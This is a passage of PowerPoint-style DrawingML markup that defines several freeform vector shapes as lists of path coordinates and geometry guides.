                      <a:lnTo>
                        <a:pt x="37" y="310"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="309" y="294"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="309" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="288" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="288" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="267" y="352"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="410"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="273" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="273" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="463"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="314" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="314" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="330" y="483"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="483"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="351" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="362" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="362" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="388" y="452"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="388" y="452"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="398" y="420"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="398" y="420"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="405"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="398" y="368"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="388" y="352"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="320" y="258"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="320" y="258"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="309" y="29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5" name="Freeform 60"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6584950" y="5710238"/>
                  <a:ext cx="166688" cy="227012"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 105 w 463"/>
                    <a:gd name="T1" fmla="*/ 110 h 631"/>
                    <a:gd name="T2" fmla="*/ 153 w 463"/>
                    <a:gd name="T3" fmla="*/ 168 h 631"/>
                    <a:gd name="T4" fmla="*/ 158 w 463"/>
                    <a:gd name="T5" fmla="*/ 168 h 631"/>
                    <a:gd name="T6" fmla="*/ 158 w 463"/>
                    <a:gd name="T7" fmla="*/ 168 h 631"/>
                    <a:gd name="T8" fmla="*/ 153 w 463"/>
                    <a:gd name="T9" fmla="*/ 120 h 631"/>
                    <a:gd name="T10" fmla="*/ 158 w 463"/>
                    <a:gd name="T11" fmla="*/ 84 h 631"/>
                    <a:gd name="T12" fmla="*/ 158 w 463"/>
                    <a:gd name="T13" fmla="*/ 84 h 631"/>
                    <a:gd name="T14" fmla="*/ 163 w 463"/>
                    <a:gd name="T15" fmla="*/ 62 h 631"/>
                    <a:gd name="T16" fmla="*/ 174 w 463"/>
                    <a:gd name="T17" fmla="*/ 47 h 631"/>
                    <a:gd name="T18" fmla="*/ 184 w 463"/>
                    <a:gd name="T19" fmla="*/ 32 h 631"/>
                    <a:gd name="T20" fmla="*/ 200 w 463"/>
                    <a:gd name="T21" fmla="*/ 15 h 631"/>
                    <a:gd name="T22" fmla="*/ 200 w 463"/>
                    <a:gd name="T23" fmla="*/ 15 h 631"/>
                    <a:gd name="T24" fmla="*/ 210 w 463"/>
                    <a:gd name="T25" fmla="*/ 10 h 631"/>
                    <a:gd name="T26" fmla="*/ 210 w 463"/>
                    <a:gd name="T27" fmla="*/ 10 h 631"/>
                    <a:gd name="T28" fmla="*/ 221 w 463"/>
                    <a:gd name="T29" fmla="*/ 0 h 631"/>
                    <a:gd name="T30" fmla="*/ 310 w 463"/>
                    <a:gd name="T31" fmla="*/ 110 h 631"/>
                    <a:gd name="T32" fmla="*/ 310 w 463"/>
                    <a:gd name="T33" fmla="*/ 110 h 631"/>
                    <a:gd name="T34" fmla="*/ 289 w 463"/>
                    <a:gd name="T35" fmla="*/ 120 h 631"/>
                    <a:gd name="T36" fmla="*/ 289 w 463"/>
                    <a:gd name="T37" fmla="*/ 120 h 631"/>
                    <a:gd name="T38" fmla="*/ 273 w 463"/>
                    <a:gd name="T39" fmla="*/ 136 h 631"/>
                    <a:gd name="T40" fmla="*/ 273 w 463"/>
                    <a:gd name="T41" fmla="*/ 136 h 631"/>
                    <a:gd name="T42" fmla="*/ 247 w 463"/>
                    <a:gd name="T43" fmla="*/ 162 h 631"/>
                    <a:gd name="T44" fmla="*/ 247 w 463"/>
                    <a:gd name="T45" fmla="*/ 162 h 631"/>
                    <a:gd name="T46" fmla="*/ 237 w 463"/>
                    <a:gd name="T47" fmla="*/ 179 h 631"/>
                    <a:gd name="T48" fmla="*/ 231 w 463"/>
                    <a:gd name="T49" fmla="*/ 199 h 631"/>
                    <a:gd name="T50" fmla="*/ 231 w 463"/>
                    <a:gd name="T51" fmla="*/ 199 h 631"/>
                    <a:gd name="T52" fmla="*/ 226 w 463"/>
                    <a:gd name="T53" fmla="*/ 215 h 631"/>
                    <a:gd name="T54" fmla="*/ 231 w 463"/>
                    <a:gd name="T55" fmla="*/ 236 h 631"/>
                    <a:gd name="T56" fmla="*/ 231 w 463"/>
                    <a:gd name="T57" fmla="*/ 236 h 631"/>
                    <a:gd name="T58" fmla="*/ 237 w 463"/>
                    <a:gd name="T59" fmla="*/ 257 h 631"/>
                    <a:gd name="T60" fmla="*/ 252 w 463"/>
                    <a:gd name="T61" fmla="*/ 278 h 631"/>
                    <a:gd name="T62" fmla="*/ 462 w 463"/>
                    <a:gd name="T63" fmla="*/ 540 h 631"/>
                    <a:gd name="T64" fmla="*/ 347 w 463"/>
                    <a:gd name="T65" fmla="*/ 630 h 631"/>
                    <a:gd name="T66" fmla="*/ 0 w 463"/>
                    <a:gd name="T67" fmla="*/ 194 h 631"/>
                    <a:gd name="T68" fmla="*/ 105 w 463"/>
                    <a:gd name="T69" fmla="*/ 110 h 6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63" h="631">
                      <a:moveTo>
                        <a:pt x="105" y="110"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="153" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="153" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="84"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="84"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="62"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="174" y="47"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="200" y="15"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="200" y="15"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="221" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="310" y="110"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="310" y="110"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="273" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="273" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="247" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="247" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="237" y="179"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="237" y="257"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="252" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="462" y="540"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="347" y="630"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="194"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="105" y="110"/>
                      </a:ln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6" name="Freeform 61"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6697663" y="5632450"/>
                  <a:ext cx="196850" cy="204788"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 263 w 547"/>
                    <a:gd name="T1" fmla="*/ 383 h 568"/>
                    <a:gd name="T2" fmla="*/ 299 w 547"/>
                    <a:gd name="T3" fmla="*/ 414 h 568"/>
                    <a:gd name="T4" fmla="*/ 336 w 547"/>
                    <a:gd name="T5" fmla="*/ 435 h 568"/>
                    <a:gd name="T6" fmla="*/ 373 w 547"/>
                    <a:gd name="T7" fmla="*/ 446 h 568"/>
                    <a:gd name="T8" fmla="*/ 389 w 547"/>
                    <a:gd name="T9" fmla="*/ 441 h 568"/>
                    <a:gd name="T10" fmla="*/ 404 w 547"/>
                    <a:gd name="T11" fmla="*/ 430 h 568"/>
                    <a:gd name="T12" fmla="*/ 426 w 547"/>
                    <a:gd name="T13" fmla="*/ 404 h 568"/>
                    <a:gd name="T14" fmla="*/ 426 w 547"/>
                    <a:gd name="T15" fmla="*/ 377 h 568"/>
                    <a:gd name="T16" fmla="*/ 415 w 547"/>
                    <a:gd name="T17" fmla="*/ 341 h 568"/>
                    <a:gd name="T18" fmla="*/ 489 w 547"/>
                    <a:gd name="T19" fmla="*/ 215 h 568"/>
                    <a:gd name="T20" fmla="*/ 515 w 547"/>
                    <a:gd name="T21" fmla="*/ 251 h 568"/>
                    <a:gd name="T22" fmla="*/ 546 w 547"/>
                    <a:gd name="T23" fmla="*/ 325 h 568"/>
                    <a:gd name="T24" fmla="*/ 546 w 547"/>
                    <a:gd name="T25" fmla="*/ 362 h 568"/>
                    <a:gd name="T26" fmla="*/ 525 w 547"/>
                    <a:gd name="T27" fmla="*/ 430 h 568"/>
                    <a:gd name="T28" fmla="*/ 467 w 547"/>
                    <a:gd name="T29" fmla="*/ 498 h 568"/>
                    <a:gd name="T30" fmla="*/ 441 w 547"/>
                    <a:gd name="T31" fmla="*/ 524 h 568"/>
                    <a:gd name="T32" fmla="*/ 389 w 547"/>
                    <a:gd name="T33" fmla="*/ 556 h 568"/>
                    <a:gd name="T34" fmla="*/ 363 w 547"/>
                    <a:gd name="T35" fmla="*/ 561 h 568"/>
                    <a:gd name="T36" fmla="*/ 310 w 547"/>
                    <a:gd name="T37" fmla="*/ 567 h 568"/>
                    <a:gd name="T38" fmla="*/ 268 w 547"/>
                    <a:gd name="T39" fmla="*/ 551 h 568"/>
                    <a:gd name="T40" fmla="*/ 226 w 547"/>
                    <a:gd name="T41" fmla="*/ 530 h 568"/>
                    <a:gd name="T42" fmla="*/ 184 w 547"/>
                    <a:gd name="T43" fmla="*/ 498 h 568"/>
                    <a:gd name="T44" fmla="*/ 110 w 547"/>
                    <a:gd name="T45" fmla="*/ 424 h 568"/>
                    <a:gd name="T46" fmla="*/ 42 w 547"/>
                    <a:gd name="T47" fmla="*/ 335 h 568"/>
                    <a:gd name="T48" fmla="*/ 21 w 547"/>
                    <a:gd name="T49" fmla="*/ 294 h 568"/>
                    <a:gd name="T50" fmla="*/ 6 w 547"/>
                    <a:gd name="T51" fmla="*/ 247 h 568"/>
                    <a:gd name="T52" fmla="*/ 0 w 547"/>
                    <a:gd name="T53" fmla="*/ 199 h 568"/>
                    <a:gd name="T54" fmla="*/ 11 w 547"/>
                    <a:gd name="T55" fmla="*/ 152 h 568"/>
                    <a:gd name="T56" fmla="*/ 21 w 547"/>
                    <a:gd name="T57" fmla="*/ 130 h 568"/>
                    <a:gd name="T58" fmla="*/ 58 w 547"/>
                    <a:gd name="T59" fmla="*/ 83 h 568"/>
                    <a:gd name="T60" fmla="*/ 84 w 547"/>
                    <a:gd name="T61" fmla="*/ 57 h 568"/>
                    <a:gd name="T62" fmla="*/ 152 w 547"/>
                    <a:gd name="T63" fmla="*/ 15 h 568"/>
                    <a:gd name="T64" fmla="*/ 173 w 547"/>
                    <a:gd name="T65" fmla="*/ 5 h 568"/>
                    <a:gd name="T66" fmla="*/ 257 w 547"/>
                    <a:gd name="T67" fmla="*/ 5 h 568"/>
                    <a:gd name="T68" fmla="*/ 299 w 547"/>
                    <a:gd name="T69" fmla="*/ 26 h 568"/>
                    <a:gd name="T70" fmla="*/ 342 w 547"/>
                    <a:gd name="T71" fmla="*/ 52 h 568"/>
                    <a:gd name="T72" fmla="*/ 426 w 547"/>
                    <a:gd name="T73" fmla="*/ 136 h 568"/>
                    <a:gd name="T74" fmla="*/ 236 w 547"/>
                    <a:gd name="T75" fmla="*/ 346 h 568"/>
                    <a:gd name="T76" fmla="*/ 247 w 547"/>
                    <a:gd name="T77" fmla="*/ 147 h 568"/>
                    <a:gd name="T78" fmla="*/ 231 w 547"/>
                    <a:gd name="T79" fmla="*/ 130 h 568"/>
                    <a:gd name="T80" fmla="*/ 210 w 547"/>
                    <a:gd name="T81" fmla="*/ 120 h 568"/>
                    <a:gd name="T82" fmla="*/ 179 w 547"/>
                    <a:gd name="T83" fmla="*/ 120 h 568"/>
                    <a:gd name="T84" fmla="*/ 163 w 547"/>
                    <a:gd name="T85" fmla="*/ 126 h 568"/>
                    <a:gd name="T86" fmla="*/ 147 w 547"/>
                    <a:gd name="T87" fmla="*/ 136 h 568"/>
                    <a:gd name="T88" fmla="*/ 126 w 547"/>
                    <a:gd name="T89" fmla="*/ 167 h 568"/>
                    <a:gd name="T90" fmla="*/ 121 w 547"/>
                    <a:gd name="T91" fmla="*/ 183 h 568"/>
                    <a:gd name="T92" fmla="*/ 126 w 547"/>
                    <a:gd name="T93" fmla="*/ 199 h 568"/>
                    <a:gd name="T94" fmla="*/ 142 w 547"/>
                    <a:gd name="T95" fmla="*/ 236 h 568"/>
                    <a:gd name="T96" fmla="*/ 179 w 547"/>
                    <a:gd name="T97" fmla="*/ 283 h 568"/>
                    <a:gd name="T98" fmla="*/ 289 w 547"/>
                    <a:gd name="T99" fmla="*/ 188 h 5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547" h="568">
                      <a:moveTo>
                        <a:pt x="263" y="383"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="263" y="383"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="414"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="414"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="373" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="373" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="389" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="430"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="430"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="420"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="404"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="377"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="377"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="341"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="389" y="304"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="515" y="251"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="536" y="288"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="546" y="325"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="546" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="546" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="541" y="398"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="525" y="430"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="504" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="467" y="498"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="467" y="498"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="524"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="541"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="389" y="556"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="363" y="561"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="363" y="561"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="310" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="561"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="268" y="551"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="268" y="551"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="498"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="498"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="110" y="424"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="110" y="424"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="74" y="383"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="42" y="335"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="42" y="335"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="247"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="247"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="225"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="130"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="37" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="58" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="57"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="57"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="15"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="383" y="89"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="157"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="346"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="383"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="247" y="147"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="247" y="147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="130"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="195" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="126"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="167"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="167"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121" y="183"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="267"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="283"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="188"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="188"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="247" y="14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7" name="Freeform 62"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6838950" y="5391150"/>
                  <a:ext cx="263525" cy="255588"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 457 w 731"/>
                    <a:gd name="T1" fmla="*/ 556 h 709"/>
                    <a:gd name="T2" fmla="*/ 493 w 731"/>
                    <a:gd name="T3" fmla="*/ 566 h 709"/>
                    <a:gd name="T4" fmla="*/ 530 w 731"/>
                    <a:gd name="T5" fmla="*/ 561 h 709"/>
                    <a:gd name="T6" fmla="*/ 572 w 731"/>
                    <a:gd name="T7" fmla="*/ 530 h 709"/>
                    <a:gd name="T8" fmla="*/ 593 w 731"/>
                    <a:gd name="T9" fmla="*/ 467 h 709"/>
                    <a:gd name="T10" fmla="*/ 588 w 731"/>
                    <a:gd name="T11" fmla="*/ 435 h 709"/>
                    <a:gd name="T12" fmla="*/ 562 w 731"/>
                    <a:gd name="T13" fmla="*/ 398 h 709"/>
                    <a:gd name="T14" fmla="*/ 525 w 731"/>
                    <a:gd name="T15" fmla="*/ 378 h 709"/>
                    <a:gd name="T16" fmla="*/ 488 w 731"/>
                    <a:gd name="T17" fmla="*/ 372 h 709"/>
                    <a:gd name="T18" fmla="*/ 441 w 731"/>
                    <a:gd name="T19" fmla="*/ 383 h 709"/>
                    <a:gd name="T20" fmla="*/ 336 w 731"/>
                    <a:gd name="T21" fmla="*/ 435 h 709"/>
                    <a:gd name="T22" fmla="*/ 257 w 731"/>
                    <a:gd name="T23" fmla="*/ 461 h 709"/>
                    <a:gd name="T24" fmla="*/ 184 w 731"/>
                    <a:gd name="T25" fmla="*/ 467 h 709"/>
                    <a:gd name="T26" fmla="*/ 116 w 731"/>
                    <a:gd name="T27" fmla="*/ 435 h 709"/>
                    <a:gd name="T28" fmla="*/ 47 w 731"/>
                    <a:gd name="T29" fmla="*/ 372 h 709"/>
                    <a:gd name="T30" fmla="*/ 0 w 731"/>
                    <a:gd name="T31" fmla="*/ 251 h 709"/>
                    <a:gd name="T32" fmla="*/ 21 w 731"/>
                    <a:gd name="T33" fmla="*/ 173 h 709"/>
                    <a:gd name="T34" fmla="*/ 73 w 731"/>
                    <a:gd name="T35" fmla="*/ 89 h 709"/>
                    <a:gd name="T36" fmla="*/ 147 w 731"/>
                    <a:gd name="T37" fmla="*/ 31 h 709"/>
                    <a:gd name="T38" fmla="*/ 220 w 731"/>
                    <a:gd name="T39" fmla="*/ 0 h 709"/>
                    <a:gd name="T40" fmla="*/ 299 w 731"/>
                    <a:gd name="T41" fmla="*/ 5 h 709"/>
                    <a:gd name="T42" fmla="*/ 393 w 731"/>
                    <a:gd name="T43" fmla="*/ 68 h 709"/>
                    <a:gd name="T44" fmla="*/ 257 w 731"/>
                    <a:gd name="T45" fmla="*/ 147 h 709"/>
                    <a:gd name="T46" fmla="*/ 226 w 731"/>
                    <a:gd name="T47" fmla="*/ 136 h 709"/>
                    <a:gd name="T48" fmla="*/ 173 w 731"/>
                    <a:gd name="T49" fmla="*/ 147 h 709"/>
                    <a:gd name="T50" fmla="*/ 147 w 731"/>
                    <a:gd name="T51" fmla="*/ 178 h 709"/>
                    <a:gd name="T52" fmla="*/ 136 w 731"/>
                    <a:gd name="T53" fmla="*/ 215 h 709"/>
                    <a:gd name="T54" fmla="*/ 136 w 731"/>
                    <a:gd name="T55" fmla="*/ 246 h 709"/>
                    <a:gd name="T56" fmla="*/ 168 w 731"/>
                    <a:gd name="T57" fmla="*/ 283 h 709"/>
                    <a:gd name="T58" fmla="*/ 220 w 731"/>
                    <a:gd name="T59" fmla="*/ 309 h 709"/>
                    <a:gd name="T60" fmla="*/ 252 w 731"/>
                    <a:gd name="T61" fmla="*/ 309 h 709"/>
                    <a:gd name="T62" fmla="*/ 410 w 731"/>
                    <a:gd name="T63" fmla="*/ 241 h 709"/>
                    <a:gd name="T64" fmla="*/ 483 w 731"/>
                    <a:gd name="T65" fmla="*/ 215 h 709"/>
                    <a:gd name="T66" fmla="*/ 546 w 731"/>
                    <a:gd name="T67" fmla="*/ 215 h 709"/>
                    <a:gd name="T68" fmla="*/ 598 w 731"/>
                    <a:gd name="T69" fmla="*/ 231 h 709"/>
                    <a:gd name="T70" fmla="*/ 651 w 731"/>
                    <a:gd name="T71" fmla="*/ 267 h 709"/>
                    <a:gd name="T72" fmla="*/ 724 w 731"/>
                    <a:gd name="T73" fmla="*/ 388 h 709"/>
                    <a:gd name="T74" fmla="*/ 719 w 731"/>
                    <a:gd name="T75" fmla="*/ 477 h 709"/>
                    <a:gd name="T76" fmla="*/ 640 w 731"/>
                    <a:gd name="T77" fmla="*/ 608 h 709"/>
                    <a:gd name="T78" fmla="*/ 557 w 731"/>
                    <a:gd name="T79" fmla="*/ 682 h 709"/>
                    <a:gd name="T80" fmla="*/ 478 w 731"/>
                    <a:gd name="T81" fmla="*/ 708 h 709"/>
                    <a:gd name="T82" fmla="*/ 363 w 731"/>
                    <a:gd name="T83" fmla="*/ 672 h 709"/>
                    <a:gd name="T84" fmla="*/ 404 w 731"/>
                    <a:gd name="T85" fmla="*/ 509 h 7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731" h="709">
                      <a:moveTo>
                        <a:pt x="420" y="525"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="420" y="525"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="457" y="556"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="457" y="556"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="561"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="566"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="566"/>
                      </a:lnTo>
                      <a:lnTo>
